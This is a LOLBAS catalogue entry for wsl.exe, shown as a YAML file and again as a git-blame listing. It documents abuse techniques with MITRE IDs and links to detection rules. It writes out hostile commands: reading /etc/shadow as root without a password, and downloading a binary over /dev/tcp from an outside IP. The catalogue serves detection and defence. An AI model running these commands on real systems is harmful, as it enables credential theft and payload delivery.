LOLBAS/yml/OtherMSBinaries/Wsl.yml

---
Name: Wsl.exe
Description: Windows subsystem for Linux executable
Author: 'Matthew Brown'
Created: 2019-06-27
Commands:
  - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe
    Description: Executes calc.exe from wsl.exe
    Usecase: Performs execution of specified file, can be used to execute arbitrary Linux commands.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
  - Command: wsl.exe -u root -e cat /etc/shadow
    Description: Cats /etc/shadow file as root
    Usecase: Performs execution of arbitrary Linux commands as root without need for password.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
  - Command: wsl.exe --exec bash -c "<command>"
    Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
    Usecase: Performs execution of arbitrary Linux commands.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
  - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
    Description: Downloads file from 192.168.1.10
    Usecase: Download file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows Server 2019, Windows 11
Full_Path:
  - Path: C:\Windows\System32\wsl.exe
Code_Sample:
  - Code:
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Child process from wsl.exe
Resources:
  - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - Link: https://twitter.com/nas_bench/status/1535431474429808642
Acknowledgement:
  - Person: Alex Ionescu
    Handle: '@aionescu'
  - Person: Matt
    Handle: '@NotoriousRebel1'
  - Person: Asif Matadar
    Handle: '@d1r4c'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'
  - Person: Konrad 'unrooted' Klawikowski
Added Wsl.yml 2019-06-27 21:39:12 +02:00			`---`
			`Name: Wsl.exe`
			`Description: Windows subsystem for Linux executable`
			`Author: 'Matthew Brown'`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Created: 2019-06-27`
Added Wsl.yml 2019-06-27 21:39:12 +02:00			`Commands:`
			`- Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe`
			`Description: Executes calc.exe from wsl.exe`
			`Usecase: Performs execution of specified file, can be used to execute arbitrary Linux commands.`
			`Category: Execute`
			`Privileges: User`
			`MitreID: T1202`
Update wsl.exe description (#378) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2024-06-07 00:42:25 +02:00			`OperatingSystem: Windows 10, Windows Server 2019, Windows 11`
Moved Wsl.yml location to OtherMSBinaries and added another example for possible usecases. 2019-06-28 15:20:56 +02:00			`- Command: wsl.exe -u root -e cat /etc/shadow`
Fixed spacing issue 2019-06-28 17:53:45 +02:00			`Description: Cats /etc/shadow file as root`
			`Usecase: Performs execution of arbitrary Linux commands as root without need for password.`
			`Category: Execute`
			`Privileges: User`
			`MitreID: T1202`
Update wsl.exe description (#378) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2024-06-07 00:42:25 +02:00			`OperatingSystem: Windows 10, Windows Server 2019, Windows 11`
			`- Command: wsl.exe --exec bash -c "<command>"`
			Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
Added additional example to wsl.exe 2020-03-25 10:26:59 +01:00			`Usecase: Performs execution of arbitrary Linux commands.`
			`Category: Execute`
			`Privileges: User`
			`MitreID: T1202`
Update wsl.exe description (#378) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2024-06-07 00:42:25 +02:00			`OperatingSystem: Windows 10, Windows Server 2019, Windows 11`
Added download example to wsl.exe 2020-03-25 11:33:02 +01:00			`- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'`
			`Description: Downloads file from 192.168.1.10`
			`Usecase: Download file`
			`Category: Download`
			`Privileges: User`
Update wsl.exe description (#378) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2024-06-07 00:42:25 +02:00			`MitreID: T1105`
			`OperatingSystem: Windows 10, Windows Server 2019, Windows 11`
Added Wsl.yml 2019-06-27 21:39:12 +02:00			`Full_Path:`
			`- Path: C:\Windows\System32\wsl.exe`
			`Code_Sample:`
			`- Code:`
			`Detection:`
$frack113$ Update old sigma link (#303) * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> 2023-10-18 17:30:34 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml`
Detection Resources and Other Updates (#179) * Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com> 2021-11-15 14:19:03 +01:00			`- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules`
Added Wsl.yml 2019-06-27 21:39:12 +02:00			`- IOC: Child process from wsl.exe`
			`Resources:`
			`- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules`
Adding and updating various LOLBINS (#229) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-11-11 17:42:44 +01:00			`- Link: https://twitter.com/nas_bench/status/1535431474429808642`
Fixed spacing error 2019-06-28 18:07:24 +02:00			`Acknowledgement:`
Added Acknowledgement to wsl.exe 2019-06-28 18:05:34 +02:00			`- Person: Alex Ionescu`
			`Handle: '@aionescu'`
			`- Person: Matt`
			`Handle: '@NotoriousRebel1'`
Added additional example to wsl.exe 2020-03-25 10:26:59 +01:00			`- Person: Asif Matadar`
			`Handle: '@d1r4c'`
Adding and updating various LOLBINS (#229) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-11-11 17:42:44 +01:00			`- Person: Nasreddine Bencherchali`
			`Handle: '@nas_bench'`
Update wsl.exe description (#378) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2024-06-07 00:42:25 +02:00			`- Person: Konrad 'unrooted' Klawikowski`